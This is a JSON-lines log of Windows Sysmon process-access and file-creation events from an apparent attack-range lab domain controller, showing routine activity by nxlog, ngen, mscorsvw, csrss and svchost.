{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8406,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.919\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.919","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:11.341\r\nProcessGuid: {E2A3D6B1-1372-5F25-0000-0010A3ED0E00}\r\nProcessId: 4692\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1254-0\\System.EnterpriseServices.Wrapper.dll\r\nCreationUtcTime: 2020-08-01 07:02:11.341","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:11.341","ProcessGuid":"{E2A3D6B1-1372-5F25-0000-0010A3ED0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1254-0\\System.EnterpriseServices.Wrapper.dll","CreationUtcTime":"2020-08-01 07:02:11.341","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:11.357\r\nProcessGuid: {E2A3D6B1-1372-5F25-0000-0010A3ED0E00}\r\nProcessId: 4692\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1254-0\\System.EnterpriseServices.dll\r\nCreationUtcTime: 2020-08-01 07:02:11.357","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:11.357","ProcessGuid":"{E2A3D6B1-1372-5F25-0000-0010A3ED0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1254-0\\System.EnterpriseServices.dll","CreationUtcTime":"2020-08-01 07:02:11.357","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8409,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:11.419\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-0010ECF40E00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:11.419","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-0010ECF40E00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8410,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:11.419\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-0010ECF40E00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:11.419","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-0010ECF40E00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:11.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-0010ECF40E00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:11.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-0010ECF40E00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:11.513\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-001071F90E00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:11.513","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-001071F90E00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:11.513\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-001071F90E00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:11.513","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-001071F90E00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:11.513\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-001071F90E00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:11.513","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-001071F90E00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
